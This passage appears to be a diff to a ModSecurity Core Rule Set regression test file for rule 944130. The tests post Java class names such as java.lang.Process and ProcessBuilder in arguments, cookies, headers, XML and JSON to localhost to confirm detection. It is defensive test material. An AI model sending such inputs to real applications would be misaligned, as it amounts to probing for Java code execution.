"localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-284 + desc: "Content-Type application/json arg value includes keyword java.lang.Integer" + 
stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Integer\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-285 + desc: "Content-Type application/json arg name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Integer\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-286 + desc: "Argument test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-287 + desc: "Argument name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity 
CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-288 + desc: "Cookie test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Number + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-289 + desc: "Cookie name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Number=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-290 + desc: "Request header test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Number + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-291 + desc: "XML attribute value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-292 + desc: "XML element value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-293 + desc: "Nested XML element value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" 
+ Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-294 + desc: "Content-Type text/plain includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-295 + desc: "Content-Type application/json arg value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Number\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-296 + desc: "Content-Type application/json arg name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + 
version: "HTTP/1.0" + data: "{\"java.lang.Number\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-297 + desc: "Argument test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-298 + desc: "Argument name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-299 + desc: "Cookie test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Object + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 
944130-300 + desc: "Cookie name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Object=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-301 + desc: "Request header test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Object + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-302 + desc: "XML attribute value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-303 + desc: "XML element value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-304 + desc: "Nested XML element value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-305 + desc: "Content-Type text/plain includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-306 + desc: "Content-Type application/json arg value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Object\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-307 + desc: "Content-Type application/json arg name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Object\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-308 + desc: "Argument test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-309 + desc: "Argument name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-310 + desc: "Cookie test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Process + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-311 + desc: "Cookie name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Process=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-312 + desc: "Request header test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Process + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-313 + desc: "XML attribute value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-314 + desc: "XML element value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-315 + desc: "Nested XML element value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id 
\"944130\"" + - test_title: 944130-316 + desc: "Content-Type text/plain includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-317 + desc: "Content-Type application/json arg value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Process\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-318 + desc: "Content-Type application/json arg name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Process\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-319 + desc: "Argument test includes keyword java.lang.ProcessBuilder" + 
stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-320 + desc: "Argument name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-321 + desc: "Cookie test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.ProcessBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-322 + desc: "Cookie name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: 
+ Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.ProcessBuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-323 + desc: "Request header test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.ProcessBuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-324 + desc: "XML attribute value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-325 + desc: "XML element value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-326 + desc: "Nested XML element value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-327 + desc: "Content-Type text/plain includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-328 + desc: "Content-Type application/json arg value includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
